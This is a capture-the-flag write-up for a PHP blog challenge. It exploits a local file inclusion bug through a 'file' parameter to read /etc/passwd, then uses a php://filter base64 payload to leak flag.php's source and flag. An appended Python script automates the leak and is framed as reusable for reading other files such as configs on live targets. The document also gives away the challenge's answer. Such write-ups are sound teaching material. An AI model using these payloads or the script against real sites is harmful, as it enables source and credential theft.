# I made a blog!

![Screenshot of Challenge](https://584771571-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGhn0OSf58IrV71Z387bZ%2Fuploads%2FwuvRz3fA5oMHqJOOcA5q%2Fimage.png?alt=media\&token=057a717b-06d5-4722-9b7c-dbee45dbfd28)

Did you check out my blog posts?

<http://ez.ctf.cafe:9999>

### Hint

robots will rule the world!

### Writeup

Let's visit the website.

![homepage of website](https://584771571-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGhn0OSf58IrV71Z387bZ%2Fuploads%2FZuOzwLAPZufV1ZRQLAkv%2Fimage.png?alt=media\&token=54e72631-50b1-4761-9f87-8409df60d60b)

When you visit <http://ez.ctf.cafe:9999/flag.php> you get a hint instead of a flag. Here it is: `How do you filter your coffee?`

Okay, good! We are on the right path. Now let's look at the blog. Click the 'Read More' button on a post and you are redirected to `http://ez.ctf.cafe:9999/blog-posts.php?file=blog1.html`.

Perfect! There is a `file` parameter, which is the classic shape of a local file inclusion (LFI) bug. Let's try passing `/etc/passwd` in that parameter.


![/etc/passwd in file parameter (working!)](https://584771571-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGhn0OSf58IrV71Z387bZ%2Fuploads%2FOUgZ9pe6sRdHmh8Sd0jn%2Fimage.png?alt=media\&token=7127dc93-bf97-4a10-a0af-3e82b3fb5bcc)

So now let's find the flag. I tried `flag`, `/home/flag` and `/root/flag`, but had no luck.

Then I remembered the hint on `flag.php` and went looking for a payload that uses PHP filters. Including `flag.php` directly is no use: the server executes the file, so only the `echo` output reaches the page. The `php://filter` wrapper with `convert.base64-encode` transforms the stream before `include` parses it, so the page returns the raw source as base64 text and nothing in it is executed.

Luckily, I found this one, thanks to PayloadsAllTheThings:

{% embed url="<https://github.com/cyberheartmi9/PayloadsAllTheThings/blob/master/File%20Inclusion%20-%20Path%20Traversal/README.md#lfi--rfi-wrappers>" %}
PayloadsAllTheThings
{% endembed %}

Use this payload and boom, you get a base64 string:

`http://ez.ctf.cafe:9999/blog-posts.php?file=php://filter/convert.base64-encode/resource=flag.php`

Output string: `PD9waHAKCWVjaG8gJ0hvdyBkbyB5b3UgZmlsdGVyIHlvdXIgY29mZmVlPyc7ICAgIAoJLy8gRVotQ1RGe0xGSV8xU18zWn0KPz4K`

This is a base64-encoded string; decode it with any base64 decoder (for example `base64 -d`).

The decoded text is the PHP source of `flag.php`: an `echo` of the coffee hint followed by a `//` comment that holds the flag. That is exactly why visiting `flag.php` directly only showed the hint: a comment never makes it into the output of the executed page, but the filter wrapper hands you the source itself. Decoding the string shows the flag!!! 🎉
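To automate the whole chain (build the wrapper URL, pull the base64 blob out of the response, decode it and grep for the flag), here is an added Python script; it is not part of the original writeup or of the challenge. It assumes the `blog-posts.php?file=` endpoint exactly as described above, and the sample response it runs against offline is constructed from the base64 string shown above. The `leak()` helper takes any resource name, so the same code reads other includable files (config files, other `.php` sources) that the page does not cover; swap the constructed `fetch` for `fetch_http` to run it against the live target.

```python
"""Automate the php://filter LFI source leak from the writeup.

Added example, not from the original writeup. The target URL is taken from
the page; SAMPLE_RESPONSE is a constructed HTML body wrapping the base64
string the challenge returned for flag.php, so everything runs offline.
"""
import base64
import re
from urllib.parse import quote
from urllib.request import urlopen

TARGET = "http://ez.ctf.cafe:9999/blog-posts.php"  # endpoint from the writeup
FLAG_RE = re.compile(r"EZ-CTF\{[^}]*\}")

# Constructed sample response: the page's base64 blob embedded in some HTML.
SAMPLE_RESPONSE = (
    "<html><body>"
    "PD9waHAKCWVjaG8gJ0hvdyBkbyB5b3UgZmlsdGVyIHlvdXIgY29mZmVlPyc7ICAgIAoJLy8gRVotQ1RGe0xGSV8xU18zWn0KPz4K"
    "</body></html>"
)


def filter_url(base, resource):
    """Build the php://filter URL that base64-encodes `resource` before include() parses it.

    The encoded stream contains no PHP tags, so the include emits it verbatim
    instead of executing the file.
    """
    wrapper = f"php://filter/convert.base64-encode/resource={resource}"
    # '/', ':' and '=' are kept literal so the wrapper syntax survives URL-encoding.
    return f"{base}?file={quote(wrapper, safe='/:=')}"


def extract_base64(body):
    """Return the longest base64-looking run in an HTML body, or None.

    The encoded source is the only long base64 run the page emits; HTML tags
    and short words never reach 16 characters of the base64 alphabet.
    """
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    return max(runs, key=len) if runs else None


def decode_source(body):
    """Decode the leaked file out of a response body; None if no blob is present."""
    blob = extract_base64(body)
    if blob is None:
        return None
    # Re-pad in case trailing '=' characters were eaten by surrounding markup.
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def find_flag(source):
    """Return the first flag-shaped token in the source, or None."""
    m = FLAG_RE.search(source)
    return m.group(0) if m else None


def fetch_http(url, timeout=10):
    """Real fetcher for a live target (not used in the offline demo)."""
    with urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def leak(resource, fetch=fetch_http, base=TARGET):
    """Leak `resource` through the filter wrapper; returns (source, flag_or_None)."""
    source = decode_source(fetch(filter_url(base, resource)))
    return source, (find_flag(source) if source else None)


if __name__ == "__main__":
    # Offline run against the constructed sample; use fetch=fetch_http for the real box.
    src, flag = leak("flag.php", fetch=lambda url: SAMPLE_RESPONSE)
    print(src)
    print("flag:", flag)
```

`extract_base64` deliberately picks the longest alphabet run rather than the first one, because the leaked blob is usually embedded in the site's own HTML template and short words like `body` also match the base64 alphabet. The re-padding step matters on real targets: `convert.base64-encode` emits padding, and sloppy templates sometimes truncate it.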

### Flag:

`EZ-CTF{LFI_1S_3Z}`
